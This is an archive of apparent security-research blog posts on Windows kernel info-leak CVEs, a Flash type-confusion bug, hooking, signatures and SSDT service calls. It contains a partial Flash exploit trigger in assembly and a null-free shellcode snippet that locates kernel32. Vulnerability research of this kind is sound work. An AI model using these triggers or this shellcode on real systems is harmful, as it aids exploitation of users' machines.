Archive for the ‘Reversing’ Category

SetWindowsHookEx Leaks A Kernel Pointer – CVE-2019-1469

Thursday, December 12th, 2019

This is another information disclosure bug I submitted a few weeks ago and was just patched by MSFT. And apparently another group of researchers found it at the same time.
The interesting thing about this bug, as of the previous info disclosure ones on my blog, is that before I found them all, I was asking myself: “How come I don’t find any information disclosure vulnerabilities?”. All I am used to find is normally potential execution vulnerabilities. And then I realized my thought-process of approaching code auditing / reverse engineering is biased toward different types of vulnerabilities, but less to the type of info leaks. And I decided I need to change what I’m looking for. And after a few days of work I found a few info leaks at once. The difference was that I realized that info leaks could be much simpler bugs (normally) and the patterns I’m used to look for, don’t normally cover info leaks.

I started to think about how code works and where kernel might pass kernel data/pointers to usermode.

It always helps me to learn previous work to get ideas and classic examples are:

  1. Data structures that have padding and alignment might contain stale/uninitialized memory and being memcpy’ed to usermode might leak data.
  2. The return value register (RAX/EAX on x64/86) might contain partial pointers once returning from a syscall (because the syscall returns void but the compiler didn’t clean the register which is always copied back to usermode).
  3. Imagine there are two subsystems in the system you’re trying to attack (say, NtUser and GDI syscalls). And then these subsystems also talk to each other in the kernel directly. Many times when NtUser calls GDI functions, it doesn’t use to check the return value, and expects to get an out parameter with some information. Now, what if you could alter the path of execution of such a GDI call from NtUser (for example, by supplying a bad HBITMAP that it will pass to the GDI subsystem). And the out parameter wasn’t initialized to begin with, and the GDI call failed, and the data is copied somehow back to usermode… happy happy joy joy. Always check return values.
  4. Also check out J00ru’s amazing work who took it to the extreme with automation.

This time our bug is different and once I figured it out, thinking how the hooking mechanism of SetWindowsHookEx works, it was trivial. Basically, for any type of events you hook in Windows, there’s 3 parameters involved in the hook procedure (passed as parameters), the event code, wparam and lparam. LPARAM is the long pointer parameter (dated from Win3.1 I believe) and contains normally a pointer to the data structure corresponding for the event code. Meaning that the kernel sends data through the lparam (which will be thunked to usermode).

But then it just occurred to me that there’s another unique type of a hook and that is the debug hook! The debug hook is a hook that will be called for any other hook procedure…

So I imagined that if the kernel passes an lparam internally before it’s being thunked, it means the debug hook sees the kernel pointer of the lparam still. And then they might forget to remove it from the lparam of the debug hook, which is the lparam of another hook procedure just about to be called.

And that worked…

In the POC I set up two hooks: the CALL-WND-PROC hook to get a window message that is sent from another thread, which has the lparam points to a data structure – now we don’t care about the info in the structure as long as it’s eventually represented by a pointer. and the second hook – the Debug, that eventually gives (leaks) the kernel pointer of the data structure of the window-create message.
And then I just SendMessage to start triggering everything.
Note that we need to hook a low level kernel-to-user-callback function that gets the raw pointer from kernel and that function eventually calls the debug procedure we passed in to SetWindowsHookEx, otherwise the pointer isn’t passed to us normally and it stays hidden.

Check it out on my github, it’s really simple.

The case of DannyDinExec – CVE-2019-1440

Wednesday, November 13th, 2019

Yet another pointer leak in the win32k driver, this time it’s a cool bug. It’s inside the DDE (Dynamic Data Exchange) component.

  1. It’s possible creating DDE objects (whatever that means) and each gets a corresponding newly created kernel window by using the NtUserDdeInitialize syscall.
  2. Internally, it adds the new DDE object to a global linked list of all such objects.
  3. In certain cases, it needs to update all DDE windows that some event occurred by sending them a message (by xxxSendMessage). Alas, this message encodes a kernel heap pointer in the LPARAM argument.

Ah ha, I thought to myself: if I manage to get the message routed to a user-mode window procedure, then the LPARAM will reveal sensitive kernel info. Profit.
Looking at the function xxxCsEvent which is the workhorse of step #3:

  1. It first converts the linked list into an array of HWNDs (not pointers, but the window-identifier) – Problem #1
  2. It then walks over the array and verifies the HWND still represents an existing window, and then it sends a DDE message to that window procedure – Problem #2

It looks something like that (which is super simplified):

count = 0;
// Query the list depth.
for (p = g_listHead; p != NULL; p = p->next) count++;
array = malloc(sizeof(HWND) * count);
// Convert the list into an array of handles.
for (i = 0, p = g_listHead; p != NULL; p = p->next, i++)
   array[i] = p->pwnd->hwnd;
// Iterate over the array and dispatch.
for (i = 0; i < count; i++)
{
  pwnd = verifywindow(array[i]);
  if (pwnd != NULL)
    xxxSendMessage(pwnd, WM_DDE_MSG, 0, kernel_ptr);
}

The way to attack this algorithm is by understanding that the kernel windows that belong to the DDE objects can be replaced during the first callback to user-mode, so the second iteration (given we created 2 DDE objects) will send a message to a window that we created from user-mode, that has exactly the same HWND (defeating problem #1 and #2), so we get the message directly from kernel, because window verification passes.

Wait, what???
If we could get the message on the first iteration to user-mode, then it's a game over already. The catch is that we can't set a user-mode window-procedure for a kernel DDE window. But we don't need to, as the DDE window procedure (xxxEventWndProc) anyway calls back to user-mode on its own by calling ClientEventCallback. Once we hook that function we're good to get control back to user-mode in the middle of the first iteration.

Now back in user-mode, we can destroy the next iterated DDE object, and it will destroy the corresponding window too, whose HWND we already know.
And now, all we have to do is to brute force to create a window that will have the same HWND, to make the verifywindow() succeed, and then xxxSendMessage sends the raw pointer to us :)

Brute forcing a HWND is very simple, because given the HWND encoding, one has to iterate exactly 16 bits space (hence, loop 0x10000 times) to get the same HWND again (over simplified again, but would work 99% of the cases). Without going into all details.

The following diagram tries to explain the flow that the attacker has to go through in order to exploit described code above:

A POC can be found on github.

Integer or pointer? CVE-2019-1071

Sunday, November 10th, 2019

A few months ago I found an info-leak in the win32k driver. It was in the xxxCreateWindowEx (CreateWindow API) and it leaked a kernel pointer to (the desktop heap of) a menu object.

The desktop heap is where all UI objects are allocated in kernel and it’s mapped to user address space too. Meaning that if one finds out the kernel address of an object, and she already got the address in user space, then it reveals the delta between the mappings (which is a secret). And now all objects addresses are known.

Note that in the beginning win32k used to map the desktop heap which revealed kernel pointers (because kernel objects contained kernel pointers in them) and it was recently fixed to harden breaking KASLR. So now such a pointer leak is very helpful for exploitation.

The origin of the bug is in the fact that the same field used for a child-window-ID is also used for a menu pointer (through ‘union’) in the window structure in the kernel. Back in the beginning of the 90’s saving memory space was sacred and this very specific optimization costed MS a few vulnerabilities already.

If you look carefully in MSDN at the CreateWindow API you will notice the HMENU argument, which can also be an ID (or an integer eventually). The bug is a confusion between the time we create the window and the time it queries for a menu.

When we create the window we pass NULL for the HMENU, however the class we use specifies a menu resource through the WNDCLASS.lpszMenuName field. Making the window creation code calling back to user-mode (#1 in snippet) to create a menu for that menu name. While back in user-mode we SetWindowLong() the same window to become a child window (WS_CHILD), meaning that from now on that field should be interpreted as an ID/integer. And now back into the kernel at xxxCreateWindow the following if statement (#2) gets confused.

if (window-not-child &&
    NULL == pmenu &&
    NULL != cls.lpszMenuName)
{
  pmenu = xxxClientLoadMenu(cls.lpszMenuName); ///// #1
}
if (window is child) ///// #2
{
  pwnd->menu = pmenu; ///// #3
  // By now pmenu should be an ID, but it's really a pointer!
}
else
{
  HMAssignmentLock(&pwnd->menu, pmenu);
}

And at last, at #3 our menu is really a pointer and not an ID! Again, the code assumes that if the window is a child then the pmenu variable is always an ID and if the window is not a child, then pmenu is really a pointer to a menu (hence the else with locking the object…).
Now since the window is really a child (as we changed it from user-mode from the xxx callback) and the menu is interpreted as an ID, we managed to leak a kernel pointer to a window-ID.

Finally, it’s accessible just by querying:
GetWindowLongPtr(hWnd, GWL_ID).

Code can be found on my github. Bonus – there’s also a NULL deref bug hidden inside that is exploitable on Windows versions that can map the NULL page.

Yippi

Flash News

Tuesday, November 13th, 2018

TLDR; There’s a bug in Adobe Flash. [It got allocated with CVE-2018-15981]
The interpreter code of the Action Script Virtual Machine (AVM)
does not reset a with-scope pointer when an exception is caught,
leading later to a type confusion bug, and eventually to a remote code execution.

First, we will start with general information on how the Flash engine, AVM, works,
because I find it fascinating and important for understanding the matter at hand.

Flash runs code by either JITting it or by interpreting it. The design of the engine is to verify the ActionScript3 (AS in short) code and the meta data only once upon loading a (SWF) file and then to run the code while trusting it (without re-validation). This improves significantly the performance of running Flash applications. This affects instructions, they are also designed to have operands as part of their (fixed) byte code. For example, the pushstring instruction will take an index number into the strings array that is defined in the SWF file and it can only point to a valid entry in that array (if it won’t, the verifier component will reject this file from being run). Later, in the JITted code or interpreter, it will assume that the verifier already confirmed this instruction with its operand and just load the requested entry and push it to the stack, as opposed to reading the entry from a register, which can be dynamically set in runtime and thus require a runtime check.
The AS code also supports a stack and registers, and since it is a dynamic language that lets one define members and properties (key/value pairs) on the fly, the engine will have to search for them every time, and to coerce their types too to the expected types; of a function argument for example. This coercion is done all over the place and is the heart of making sure types are safe all over their use. The coercion will even go further and change a type to another expected type automatically to be valid for that function call.

When the AVM runs code, the relevant part in the verifier is doing its important job by following and analyzing statically all instructions by simulating them and it verifies the types of all registers, variables on the stack and more, in order to see how they are about to be used, and if it sees they are used as invalid/wrong types, it will fail loading the file in advance. Otherwise it will just let the operation continue normally with assuming the type is correct and expected. Imagine there’s a function prototype that receives an integer argument:
function foo(bar:int):void {}
but you pass a string to it instead:
foo("imahacker")
then the verifier won’t like it and will fail this code from running. In other times, if you pass an object which has a default-value method, it might invoke it in run time to hopefully get an integer, but it will make sure in runtime that it really got an integer… so some of the checks also happen in runtime when it can’t know in static time (so yes, it’s okay to pass object as an integer).

Another trait of AS is what make properties dynamic, or technically how they are searched for every time. Starting with local scope and going to higher scopes in the hierarchy up to the globals’ scope. This is all documented. It hurts to know that much searching is done in order to find the right property in the scope chain every time code accessed it.
Perhaps Flash gives full OOP abilities on top of a dynamic language but when we take a look at the open source code of the AVM, it’s really horrifying, code dups all over instead of encapsulation, or the same part of the SWF will be parsed in multiple places and each time different functionality will be applied to it and other horrors…that we, security researchers, love.

Anyway, Flash will prefer to use the JIT as much as possible to run actual code, because it’s faster. It will emit real code of the target hosting architecture while doing the same pass for verifying the code. And it can even JIT a function while it’s already running inside the interpreter and continue from that state, impressive. However, remember that the interpreter is always used to run constructors of a user class defined in the SWF. And this is how we make sure our code will get to run inside the vulnerable interpreter. The engine can also handle exceptions on its own (try-catch and throw), employing setbuf and jmpbuf, so if an exception is raised inside an AS function, the interpreter implementation or the JIT infrastructure itself will catch it and pass it along the
next handler in the chain until a correct AS catch-handler with the right type will be found and execution will resume inside the interpreter, in our case, from that spot of the catch handler.
Basically, if you try to make an infinite call-recursion to itself, you won’t see a native (Windows/Linux) exception thrown, but rather the interpreter checks the size of its own stack artificially in some spots and will emulate its own stack overflow/underflow exceptions. If you will try to do an integer division by zero, then they already handle it themselves in the div instruction handler, etc. It’s pretty much robust and a closed system. There are many other interesting Flash internals topics, like atoms, the garbage collector, JIT, etc, but that won’t be covered today.

Now that you have some idea of how the AVM works.
Let’s talk business.
In AS you can use the keyword “with” to be lazy and omit the name of the instance whose members you want to access.
That’s normal in many scripting languages, but I will show it nevertheless.
For example, instead of doing:
point.x = 0x90;
point.y = 0xc3;
point.z = 0xcd;
It can be written as following using the “with” keyword:
with (point)
{
 x = 0x90;
 y = 0xc3;
 z = 0xcd;
}
For each assignment the interpreter will first use the with-scope if it’s set to avoid searching the full chain, once it got the property it will make the assignment itself. So, there’s an actual function that looks up the property in the scopes array of a given function. The origin of the bug occurs once an exception is thrown in the code, the catch handler infrastructure inside the interpreter will NOT reset its with-scope variable, so actually it will keep looking for properties in that with-scope in the next times. But (a big BUTT) the verifier, while simulating the exception catching,
will reset its own state for the with-scope. And this, ladies and gentlemen, leads to a discrepancy between the verifier and the interpreter. Thus, opens a type confusion attack. Pow pow pow. In other words, we managed to make the interpreter do one thing, while the verifier thinks it does another (legit) thing.

This is how we do it:
In the beginning we load the with-scope with a legit object. We later raise a dummy exception and immediately catch it ourselves. Now, the interpreter will still use the with-object we loaded, although the verifier thinks we don’t use a with-scope anymore, we will query for a member with a certain controlled type from the with-scope again and now use it as an argument for a function or an operand for an instruction that expects something else, and voila we got a type confusion. Remember, the verifier will think we use a different property that matches the expected type we want to forge and thus won’t fail loading our file.

Let’s see the bug in the interpreter code first, and then an example on how to trigger it.
At line 796, you can see:
register Atom* volatile withBase = NULL;

That’s the local variable of the interpreter function that we’re messing up with (pun intended)! Note that technically the withBase is used as a pointer-offset to the scopeBase array
(that’s all the scopes that the function loaded on its scopes stack), but that doesn’t change the logic or nature of the bug, just how we tailor the bits and bytes to trigger the bug, if you are interested to understand this confusing description, you will have to read findproperty implementation. And at line 2347 which is the handler of the findproperty instruction:
*(++sp) = env->findproperty(scope, scopeBase, scopeDepth, multiname, b1, withBase);

See they pass the withBase to the findproperty, that’s the one to look up a property in the scope chain. This is where we will make it return a different property,
while the verifier will think it returned a valid typed property from our object. Now, we can use throw keyword to raise an exception, and the catch handler infrastructure at line 3540, will handle it.
CATCH (Exception *exception)

You can see that it will reset many variables of its own state machine, and set the interpreter’s PC (program counter, or next instruction’s address) to start with the target handler’s address, etc.
But they forgot to reset the withBase. I bet they didn’t forget, and they did it for performance sake, their code has tons of micro and obsessive optimizations, that today a good engineer wouldn’t just do. You can also note that they clear scopeBase array only in debugger mode (line 3573), and that used to be another bug, until they realized they better do it always.
They used to have many bugs around the scope arrays in the interpreter, but they’re all fixed now in the binaries, since we look at an old source code you can still find them.

Finally, let’s see how we would maneuver this altogether.
I used the great rabcdasm tool to assemble this.
This code is partial and only the relevant guts of the triggering exploit.

; All functions start with some default scope, we keep it too.
getlocal0
pushscope

; We create a property with the name "myvar" that is really an object itself of type NewClass2.
; This property which is inside the object/dictionary will be the one the verifier sees.
getlocal0
findpropstrict QName(PackageNamespace(""), "NewClass2")
constructprop QName(PackageNamespace(""), "NewClass2"), 0
initproperty QName(PackageInternalNs(""), "myvar")

; We push a second item on the scope array,
; to make the withBase point to its location in the scopes array.
; Note this array contains both normal scope objects and with scope objects.
getlocal0
pushwith

; Now we throw an exception, just to make the interpreter keeping a stale withBase.
L10:
pushbyte 1
throw
L12:
nop
L16:
; This is our catch handler, we continue to do our thing.
; Now note that the withBase points to the second item on the scopes array,
; which currently won't be used until we put something there (because the scopes array is empty).

; Put back the first scope on the scope stack, so we can work normally.
getlocal0
pushscope

; Now we're going to create an object which has one property of an integer type and its name is "myvar".
; This property will be returned instead of the correct one from the object we created above.
pushstring "myvar"
; Next is the attacking type to be really used instead!!!1@ :)
; This is the actual value that will be fetched by getproperty instruction below.
pushint 534568
; Create an object with 1 property (name, value pair on the stack)
newobject 1
; Mark it as an object type.
coerce QName(PackageNamespace(""), "Object")

; And now push it to the scope, note we don't use pushwith this time!
; Because we want to keep old value, otherwise verifier will be on to us,
; This makes our object that we just created as the new with-scope object.
pushscope

; Now, findproperty et al will actually scan for our property using the withBase in practice,
; which has our fake object that we recently created,
; containing a property with the "myvar" name, with a different type from what the verifier sees
; (Remember - it sees the object above, in the beginning of this function).
findproperty Multiname("myvar", [PackageInternalNs(""), PackageNamespace("")])
getproperty Multiname("myvar", [PackageInternalNs(""), PackageNamespace("")])

; Now practically on the stack we have an integer,
; instead of an object, and next executing getslot which assumes an object (NewClass2) is in the stack,
; will crash miserably!
getslot 1

returnvoid

The triggering code can be done with many different variations. Instructions like nextvlaue can be targeted too, because it doesn’t verify its operands in runtime and can leak pointers etc.
When I found this bug at first, I thought there’s small chance it’s a real bug. Particularly, I had my doubts, because the chances to have a forgotten/dangling with-scope is high in a normal Flash application. So how come nobody encountered this bug before as a misbehavior of their app? E.G. by getting a wrong variable, etc. Apparently, the combination to cause this scenario accurately is not that high after all.

Good bye Flash, you’ve been kind…

Kernel Exploits

Monday, November 21st, 2011

Hey

I’m uploading a presentation of a good friend, Gilad Bakas, who has just spoken in Ruxcon in Australia.

Get it now: Kernel Exploits

Enjoy

IsDebuggerPresent – When To Attach a Debugger

Wednesday, October 12th, 2011

This API is really helpful sometimes. And no, I’m not talking about using it for anti-debugging, com’on.
Suppose you have a complicated application that you would like to debug on special occasions.
Two concerns arise:
1 – you don’t want to always DebugBreak() at a certain point, which will nuke the application every time the code is running at that point (because 99% of the times you don’t have a debugger attached, or it’s a release code, obviously).
2 – on the other hand, you don’t want to miss that point in execution, if you choose you want to debug it.

An example would be, to set a key in the registry that each time it will be checked and if it is set (no matter the value), the code will DebugBreak().
A similar one would be to set a timeout, that on points of your interest inside the code, it will be read and wait for that amount of time, thus giving you enough time for attaching a debugger to the process.
Or setting an environment variable to indicate the need for a DebugBreak, but that might be a pain as well, cause environment blocks are inherited from parent process, and if you set a system one, it doesn’t mean your process will be affected, etc.
Another idea I can think of is pretty obvious, to create a file in some directory, say, c:\debugme, that the application will check for existence, and if so it will wait for attaching a debugger.

What’s in common for all the approaches above? Eventually they will DebugBreak or get stuck waiting for you to do the work (attaching a debugger).

But here I’m suggesting a different flow, check that a debugger is currently present, using IsDebuggerPresent (or thousands of other tricks, why bother?) and only then fire the DebugBreak. This way you can extend it to wait in certain points for a debugger-attach.

The algorithm would be:

read timeout from registry (or check an existence of a file, or whatever you’re up to. Which is most convenient for you)
if exists, while (timeout not passed)
if IsDebuggerPresent DebugBreak()
sleep(100) – or just wait a bit not to hog CPU

That’s it, so the application would always run normally, unless there’s some value set to hint you would like to attach a debugger in certain points, and if you don’t want to, it will timeout and continue normally. Of course, it’s possible to add some log messages, you will know it’s time to attach a debugger, in case you haven’t attached it earlier…

It’s always funny to see people call MessageBox, and then they attach a debugger, they then want to set a breakpoint at some function or instruction or even straight away at the caller itself, but can’t find that place easily without symbols or expertise. Instead, put a breakpoint at the end of the MessageBox function and step out of it.

Thanks to Yuval Kokhavi for this great idea. If you have a better idea or implementation please share it with us ;)

Finding Kernel32 Base Address Shellcode

Thursday, July 7th, 2011

Yet another one…
This time, smaller, more correct, and still null-free.
I looked a bit at some shellcodes at exploit-db and googled too, to see whether anyone got a smaller way to no avail.

I based my code on:
http://skypher.com/index.php/2009/07/22/shellcode-finding-kernel32-in-windows-7/
AFAIK, who based his post on:
http://blog.harmonysecurity.com/2009_06_01_archive.html

And this is my version:

00000000 (02) 6a30                     PUSH 0x30
00000002 (01) 5e                       POP ESI
; Use DB 0x64; LODSD
00000003 (02) 64ad                     LODS EAX, [FS:ESI]
00000005 (03) 8b700c                   MOV ESI, [EAX+0xc]
00000008 (03) 8b761c                   MOV ESI, [ESI+0x1c]
0000000b (03) 8b5608                   MOV EDX, [ESI+0x8]
0000000e (04) 807e1c18                 CMP BYTE [ESI+0x1c], 0x18
00000012 (02) 8b36                     MOV ESI, [ESI]
00000014 (02) 75f5                     JNZ 0xb

The tricky part was how to read from FS:0x30, and the way I use is the smallest one, at least from what I checked.
Another issue that was fixed is the check for kernel32.dll, usually the variation of this shellcode checks for a null byte, but it turned out to be bogous on W2k machines, so it was changed to check for a null word. Getting the shellcode by a byte or two longer.

This way, it’s only 22 bytes, it doesn’t assume that kernel32.dll is the second/third entry in the list, it actually loops till it finds the correct module length (len of ‘kernel32.dll’ * 2 bytes). Also since kernelbase.dll can come first and that renders lots of implementations of this technique unusable.
And obviously the resulting base address of kernel32.dll is in EDX.

Enjoy

[Update July 9th:]
Here’s a link to an explanation about PEB/LDR lists.
See first comment for a better version which is only 17 bytes.

Private Symbols Look Up by Binary Signatures

Friday, July 1st, 2011

This post could really be extended and divided into a few posts, but I decided to try and keep it small as much as I can. If I see it draws serious attention I might elaborate on the topic.

Signature matching for finding functions is a very old technique, but I haven’t found anyone who talks about it with juicy details or at all, and decided to show you a real life example. It is related to the last post about finding service functions in the kernel. The problem is that sometimes inside the kernel you want to use internal functions, which are not exported. Don’t start with “this is not documented story”, I don’t care, sometimes we need to get things done no matter what. Sometimes there is no documented way to do what you want. Even in legitimate code, it doesn’t have to be a rootkit, alright? I can say, however, that when you wanna add new functionality to an existing and working system, in whatever level it might be, you would better depend as much as you can on the existing functionality that was written by the original programmers of that system. So yes, it requires lot of good reversing, before injecting more code and mess up with the process.
The example of a signature I’m going to talk about is again about getting the function ZwProtectVirtualMemory address in the kernel. See the old post here to remember what’s going on. Obviously the solution in the older post is almost 100% reliable, because we have anchors to rely upon. But sometimes with signature matching the only anchors you have are binary pieces of:
* immediate operand values
* strings
* xrefs
* disassembled instructions
* a call graph to walk on
and the list gets longer and can really get crazy and it does, but that’s another story.

I don’t wanna convert this post into a guideline of how to write a good signature, though I have lots of experience with it, even for various archs, though I will just say that you never wanna put binary code as part of your signature, only in extreme cases (I am talking about the actual opcode bytes), simply because you usually don’t know what the compiler is going to do with the source code, how it’s going to look in assembly, etc. The idea of a good signature is that it will be as generic as possible so it will survive (hopefully) the updates of the target binary you’re searching in. This is probably the most important rule about binary signatures. Unfortunately we can never guarantee a signature is to be future compatible with new updates. But always test that the signature matches on a few versions of the binary file. Suppose it’s a .DLL, then try to get as many versions of that DLL file as possible and make a script to try it out on all of them, a must. The more DLLs the signature is able to work on successfully, the better the signature is! Usually the goal is to write a single signature that covers all versions at once.
The reason you can’t rely on opcodes in your binary signature is because they get changed many times, almost in every compilation of the code in a different version, the compiler will allocate new registers for the instructions and thus change the instructions. Or since code might get compiled to many variations which effectively do the same thing, I.E: MOV EAX, 0 and XOR EAX, EAX.
One more note, a good signature is one that you can find FAST. We don’t really wanna disassemble the whole file and run on the listing it generated. Anyway, caching is always a good idea and if you have many passes to do for many signatures to find different things, you can always cache lots of stuff, and save precious loading time. So think well before you write a signature and be sure you’re using a good algorithm. Finding an XREF for a relative branch takes lots of time, try to avoid that, that should be cached, in one pass of scanning the whole code section of the file, into a dictionary of “target:source” pairs, with false positives (another long story) that can be looked up for a range of addresses…

I almost forgot to mention, I used such a binary signature inside the patch I wrote as a member of ZERT, for closing a vulnerability in Internet Explorer, I needed to find the weak function and patch it in memory, so you can both grab the source code and see for yourself. Though the example does use opcodes (and lots of them) as part of the signature, but there’s special reason for it. Long story made short: The signature won’t match once the function will get officially patched by MS (recall that we published that solution before MS acted), and then this way the patcher will know that it didn’t find the signature and probably the function was already patched well, so we don’t need to patch it on top of the new patch.. confusing shit.

The reason I find signatures amazing is because only reversers can do them well and it takes lots of skills to generate good ones,
happy signaturing :)

And surprisingly I found the following link which is interesting: http://wiki.amxmodx.org/Signature_Scanning

So let’s delve into my example, at last.
Here’s a real example of a signature for ZwProtectVirtualMemory in a Kernel driver.

Signature Source Code

From my tests this signature worked well on many versions…though always expect it might be broken.

Binary Hooking Problems

Saturday, May 14th, 2011

Most binary hooking engines write a detour in the entry point of the target function. Other hooking engines patch the IAT table, and so on. One of the problems with overwriting the entry point with a JMP instruction is that you need enough room for that instruction, usually a mere 5 bytes will suffice.

How do the hooking algorithms decide how much is “enough”?

Pretty easy, they use a dissasembler to query the size of each instruction they scan, so if the total size of the instructions that were scanned is more than 5 bytes, they’re done.
As an example, usually, functions start with these two instructions:
PUSH EBP
MOV EBP, ESP

which take only 3 bytes. And we already said that we need 5 bytes total, in order to replace the first instructions with our JMP instruction. Hence the scan will have to continue to the next instruction or so, till we got at least 5 bytes.

So 5 bytes in x86 could contain from one instruction to 5 instructions (where each takes a single byte, obviously). Or even a single instruction whose size is longer than 5 bytes. (In x64 you might need 12-14 bytes for a whole-address-space JMP, and it only makes matter worse).

It is clear why we need to know the size of instructions, since we overwrite the first 5 bytes, we need to relocate them to another location, the trampoline. There we want to continue the execution of the original function we hooked and therefore we need to continue from the next instruction that we haven’t override. And it is not necessarily the instruction at offset 5… otherwise we might continue execution in the middle of an instruction, which is pretty bad.

Lame hooking engines don’t use disassemblers, they just have a predefined table of popular prologue instructions. Come a different compiled code, they won’t be able to hook a function. Anyway, we also need a disassembler for another reason, to tell whether we hit a dead end instruction, such as: RET, INT 3, JMP, etc. These are hooking spoilers, because if the first instruction of the target function is a simple RET (thus the function doesn’t do anything, leave aside cache side effects for now), or even a “return 0” function, which usually translates into “xor eax, eax; ret”, still takes only 3 bytes and we can’t plant a detour. So we find ourselves trying to override 5 bytes where the whole function takes several bytes (< 5 bytes), and we cannot override past that instruction since we don’t know what’s there. It might be another function’s entry point, data, NOP slide, or what not. The point is that we are not allowed to do that and eventually cannot hook the function, fail.

Another problem is relative-offset instructions. Suppose any of the first 5 bytes is a conditional branch instruction, we will have to relocate that instruction. Usually conditional branch instruction are only 2 bytes. And if we copy them to the trampoline, we will have to convert them into the longer variation which is 6 bytes and fix the offset. And that would work well. In x64, RIP-relative instructions are also pain in the butt, as well as any other relative-offset instruction which requires a fix. So there’s quiet a long list of those and a good hooking engine has to support them all, especially in x64 where there’s no standard prologue for a function.

I noticed a specific case where WaitForSingleObject is being compiled to:
XOR R8D, R8D
JMP short WaitForSingleObjectEx

in x64 of course; the xor takes 3 bytes and the jmp is a short one, which takes 2 bytes. And so you got 5 bytes total and should be able to hook it (it’s totally legal), but the hook engine I use sucked and didn’t allow that.

So you might say, ok, I got a generic solution for that, let’s follow the unconditional branch and hook that point. So I will hook WaitForSingleObjectEx instead, right? But now you got to the dreaded entry points problem. You might get called for a different entry point that you never meant to hook. You wanted to hook WaitForSingleObject and now you end up hooking WaitForSingleObjectEx, so all callers to WaitForSingleObject get to you, that’s true. In addition, now all callers to WaitForSingleObjectEx get to you too. That’s a big problem. And you can’t ever realize on whose behalf you were called (with a quick and legitimate solution).

The funny thing about the implementation of WaitForSingleObject is that it was followed immediately by an alignment NOP slide, which is never executed really, but the hooking engine can’t make a use of it, because it doesn’t know what we know. So unconditional branches screw up hooking engines if they show up before 5 bytes from the entry point, and we just saw that following the unconditional branch might screw us up as well with wrong context. So if you do that, it’s ill.

What would you do then in such cases? Cause I got some solutions, although nothing is perfect.

Calling System Service APIs in Kernel

Wednesday, January 26th, 2011

In this post I am not going to shed any new light about this topic, but I didn’t find anything like this organized in one place, so I decided to write it down, hope you will find it useful.

Sometimes when you develop a kernel driver you need to use some internal API that cannot be accessed normally through the DDK. Though you may say “but it’s not an API if it’s not officially exported and supported by MS”. Well that’s kinda true, the point is that some functions like that which are not accessible from the kernel, are really accessible from usermode, hence they are called API. After all, if you can call NtCreateFile from usermode, eventually you’re supposed to be able to do that from kernel, cause it really happens in kernel, right? Obviously, NtCreateFile is an official API in the kernel too.

When I mean using system service APIs, I really mean by doing it platform/version independent, so it will work on all versions of Windows. Except when MS changes the interface (number of parameters for instance, or their type) to the services themselves, but that rarely happens.

I am not going to explain how the architecture of the SSDT and the transitions from user to kernel or how syscalls, etc work. Just how to use it to our advantage. It is clear that MS doesn’t want you to use some of its APIs in the kernel. But sometimes it’s unavoidable, and using undocumented API is fine with me, even in production(!) if you know how to do it well and as robust as possible, but that’s another story. We know that MS doesn’t want you to use some of these APIs because a) they just don’t export it in kernel on purpose, that is. b) starting with 64 bits versions of Windows they made it harder on purpose to use or manipulate the kernel, by removing previously exported symbols from kernel, we will get to that later on.

Specifically I needed ZwProtectVirtualMemory, because I wanted to change the protection of some page in the user address space. And that function isn’t exported by the DDK, bummer. Now remember that it is accessible to usermode (as VirtualProtectMemory through kernel32.dll syscall…), therefore there ought to be a way to get it (the address of the function in kernel) in a reliable manner inside a kernel mode driver in order to use it too. And this is what I’m going to talk about in this post. I’m going to assume that you already run code in the kernel and that you are a legitimate driver because it’s really going to help us with some exported symbols, not talking about shellcodes here, although shellcodes can use this technique by changing it a bit.

We have a few major tasks in order to achieve our goal: Map the usermode equivalent .dll file. We need to get the index number of the service we want to call. Then we need to get the base address of ntos and the address of the (service) table of pointers (the SSDT itself) to the functions in the kernel. And voila…

The first one is easy both in 32 and 64 bits systems. There are mainly 3 files which make the syscalls in usermode, such as: ntdll, kernel32 and user32 (for GDI calls). For each API you want to call in kernel, you have to know its prototype and in which file you will find it (MSDN supplies some of this or just Google it). The idea is to map the file to the address space as an (executable) image. Note that the cool thing about this mapping is that you will get the address of the required file in usermode. Remember that these files are physically shared among all processes after boot time (For instance, addresses might change because of ASLR but stay consistent as long as the machine is up). Following that we will use a similar functionality to GetProcAddress, but one that you have to write yourself in kernel, which is really easy for PE and PE+ (64 bits).

Alright, so we got the image mapped, we can now get some usermode API function’s address using our GetProcAddress, now what? Well, now we have to get the index number of the syscall we want. Before I continue, this is the right place to say that I’ve seen so many approaches to this problem, disassemblers, binary patterns matching, etc. And I decided to come up with something really simple and maybe new. You take two functions that you know for sure that are going to be inside kernel32.dll (for instance), say, CreateFile and CloseHandle. And then simply compare byte after byte from both functions to find the first different byte, that byte contains the index number of the syscall (or the low byte out of the 4 bytes integer really). Probably you have no idea what I’m talking about, let me show you some usermode API’s that directly do syscalls:

XP SP3 ntdll.dll
B8 25 00 00 00                    mov     eax, 25h        ; NtCreateFile
BA 00 03 FE 7F                    mov     edx, 7FFE0300h
FF 12                             call    dword ptr [edx]
C2 2C 00                          retn    2Ch

B8 19 00 00 00                    mov     eax, 19h        ; NtClose
BA 00 03 FE 7F                    mov     edx, 7FFE0300h
FF 12                             call    dword ptr [edx]
C2 04 00                          retn    4

Vista SP1 32 bits ntdll.dll

B8 3C 00 00 00                    mov     eax, 3Ch        ; NtCreateFile
BA 00 03 FE 7F                    mov     edx, 7FFE0300h
FF 12                             call    dword ptr [edx]
C2 2C 00                          retn    2Ch

B8 30 00 00 00                    mov     eax, 30h        ; NtClose
BA 00 03 FE 7F                    mov     edx, 7FFE0300h
FF 12                             call    dword ptr [edx]
C2 04 00                          retn    4

Vista SP2 64 bits ntdll.dll

4C 8B D1                          mov     r10, rcx        ; NtCreateFile
B8 52 00 00 00                    mov     eax, 52h
0F 05                             syscall
C3                                retn

4C 8B D1                          mov     r10, rcx        ; NtClose
B8 0C 00 00 00                    mov     eax, 0Ch
0F 05                             syscall
C3                                retn

2008 sp2 64 bits ntdll.dll

4C 8B D1                          mov     r10, rcx        ; NtCreateFile
B8 52 00 00 00                    mov     eax, 52h
0F 05                             syscall
C3                                retn

4C 8B D1                          mov     r10, rcx        ; NtClose
B8 0C 00 00 00                    mov     eax, 0Ch
0F 05                             syscall
C3                                retn

Win7 64bits syswow64 ntdll.dll

B8 52 00 00 00                    mov     eax, 52h        ; NtCreateFile
33 C9                             xor     ecx, ecx
8D 54 24 04                       lea     edx, [esp+arg_0]
64 FF 15 C0 00 00+                call    large dword ptr fs:0C0h
83 C4 04                          add     esp, 4
C2 2C 00                          retn    2Ch

B8 0C 00 00 00                    mov     eax, 0Ch        ; NtClose
33 C9                             xor     ecx, ecx
